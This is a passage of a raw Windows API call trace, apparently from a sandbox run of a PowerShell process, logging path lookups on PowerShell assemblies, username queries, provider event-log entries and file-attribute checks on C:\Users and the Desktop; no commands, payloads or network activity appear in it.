(pv=0x1b7401c0) [0103.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.716] CoTaskMemAlloc (cb=0x804) returned 0x1f1320 [0103.716] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1f1320, nSize=0x1ad1c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad1c8) returned 0x1 [0103.717] CoTaskMemFree (pv=0x1f1320) [0103.717] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.717] GetUserNameW (in: lpBuffer=0x26e210, pcbBuffer=0x1ad208 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad208) returned 1 [0103.717] CoTaskMemFree (pv=0x26e210) [0103.718] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c13f38*="Function", lpRawData=0x3c13cc8) returned 1 [0103.721] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0103.721] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.721] CoTaskMemFree (pv=0x1b7401c0) [0103.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.811] CoTaskMemAlloc (cb=0x804) returned 0x1f1320 [0103.811] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1f1320, nSize=0x1ad1c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad1c8) returned 0x1 [0103.812] CoTaskMemFree (pv=0x1f1320) [0103.812] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.812] GetUserNameW (in: lpBuffer=0x26e210, pcbBuffer=0x1ad208 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad208) returned 1 [0103.812] CoTaskMemFree (pv=0x26e210) [0103.812] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c36760*="Registry", lpRawData=0x3c364f0) returned 1 [0103.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.814] CoTaskMemAlloc (cb=0x804) returned 0x1f1320 [0103.814] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1f1320, nSize=0x1ad1c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad1c8) returned 0x1 [0103.814] CoTaskMemFree (pv=0x1f1320) [0103.814] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.814] GetUserNameW (in: lpBuffer=0x26e210, pcbBuffer=0x1ad208 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad208) returned 1 [0103.814] CoTaskMemFree (pv=0x26e210) [0103.815] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c3bb78*="Variable", lpRawData=0x3c3b908) returned 1 [0103.816] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0103.816] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.816] CoTaskMemFree (pv=0x1b7401c0) [0103.818] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0103.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.818] CoTaskMemFree (pv=0x1b7401c0) [0103.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1aca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0103.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ac9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0103.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ac9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0103.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ac9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0103.855] CoTaskMemAlloc (cb=0x804) returned 0x1f1320 [0103.855] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1f1320, nSize=0x1ad1c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad1c8) returned 0x1 [0103.855] CoTaskMemFree (pv=0x1f1320) [0103.855] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.855] GetUserNameW (in: lpBuffer=0x26e210, pcbBuffer=0x1ad208 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad208) returned 1 [0103.856] CoTaskMemFree (pv=0x26e210) [0103.856] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c4f790*="Certificate", lpRawData=0x3c4f520) returned 1 [0103.862] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0103.862] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.862] CoTaskMemFree (pv=0x1b7401c0) [0103.866] GetLogicalDrives () returned 0x4 [0103.866] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ace50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0103.866] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0103.867] CoTaskMemAlloc (cb=0x20e) returned 0x2ec6a0 [0103.867] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2ec6a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0103.867] CoTaskMemFree (pv=0x2ec6a0) [0103.868] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0103.868] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.868] CoTaskMemFree (pv=0x1b7401c0) [0103.869] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0103.869] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.869] CoTaskMemFree (pv=0x1b7401c0) [0103.884] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0103.884] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.884] CoTaskMemFree (pv=0x1b7401c0) [0103.885] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0103.885] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.885] CoTaskMemFree (pv=0x1b7401c0) [0103.885] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1acbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0103.885] SetErrorMode (uMode=0x1) returned 0x1 [0103.885] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1ace10 | out: lpFileInformation=0x1ace10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa73b02e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xa73b02e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0103.886] SetErrorMode (uMode=0x1) returned 0x1 [0103.886] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1acbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0103.886] SetErrorMode (uMode=0x1) returned 0x1 [0103.886] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1ace10 | out: lpFileInformation=0x1ace10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa73b02e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xa73b02e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0103.886] SetErrorMode (uMode=0x1) returned 0x1 [0103.886] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0103.886] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.886] CoTaskMemFree (pv=0x1b7401c0) [0103.891] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1acd50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0103.892] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acbc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0103.892] SetErrorMode (uMode=0x1) returned 0x1 [0103.892] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1acdd0 | out: lpFileInformation=0x1acdd0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0103.892] SetErrorMode (uMode=0x1) returned 0x1 [0103.892] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acbc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0103.892] SetErrorMode (uMode=0x1) returned 0x1 [0103.892] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1acdd0 | out: lpFileInformation=0x1acdd0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0103.892] SetErrorMode (uMode=0x1) returned 0x1 [0103.892] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acbd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0103.892] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1acac0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0103.892] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1acbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0103.893] SetErrorMode (uMode=0x1) returned 0x1 [0103.893] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1acdd0 | out: lpFileInformation=0x1acdd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0103.893] SetErrorMode (uMode=0x1) returned 0x1 [0103.893] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1acbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0103.893] SetErrorMode (uMode=0x1) returned 0x1 [0103.893] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1acdd0 | out: lpFileInformation=0x1acdd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0103.893] SetErrorMode (uMode=0x1) returned 0x1 [0103.893] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1acbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0103.893] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x1acac0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0103.893] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1acbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0103.894] SetErrorMode (uMode=0x1) returned 0x1 [0103.894] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1acdd0 | out: lpFileInformation=0x1acdd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0103.894] SetErrorMode (uMode=0x1) returned 0x1 [0103.894] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1acbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0103.894] SetErrorMode (uMode=0x1) returned 0x1 [0103.894] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1acdd0 | out: lpFileInformation=0x1acdd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0103.895] SetErrorMode (uMode=0x1) returned 0x1 [0103.895] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1acbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0103.895] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\.", nBufferLength=0x105, lpBuffer=0x1acac0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0103.895] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1acbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0103.895] SetErrorMode (uMode=0x1) returned 0x1 [0103.895] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1acdd0 | out: lpFileInformation=0x1acdd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa73b02e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xa73b02e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0103.896] SetErrorMode (uMode=0x1) returned 0x1 [0103.896] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1acbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0103.896] SetErrorMode (uMode=0x1) returned 0x1 [0103.896] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1acdd0 | out: lpFileInformation=0x1acdd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa73b02e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xa73b02e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0103.896] SetErrorMode (uMode=0x1) returned 0x1 [0103.896] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1acbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0103.896] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x1acac0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0103.897] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1acc00, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0103.897] SetErrorMode (uMode=0x1) returned 0x1 [0103.897] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1ace10 | out: lpFileInformation=0x1ace10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0103.897] SetErrorMode (uMode=0x1) returned 0x1 [0103.897] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1acc00, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0103.898] SetErrorMode (uMode=0x1) returned 0x1 [0103.898] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1ace10 | out: lpFileInformation=0x1ace10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0103.898] SetErrorMode (uMode=0x1) returned 0x1 [0103.898] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1acc10, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0103.898] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x1acb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0103.898] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1acc00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0103.898] SetErrorMode (uMode=0x1) returned 0x1 [0103.898] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js 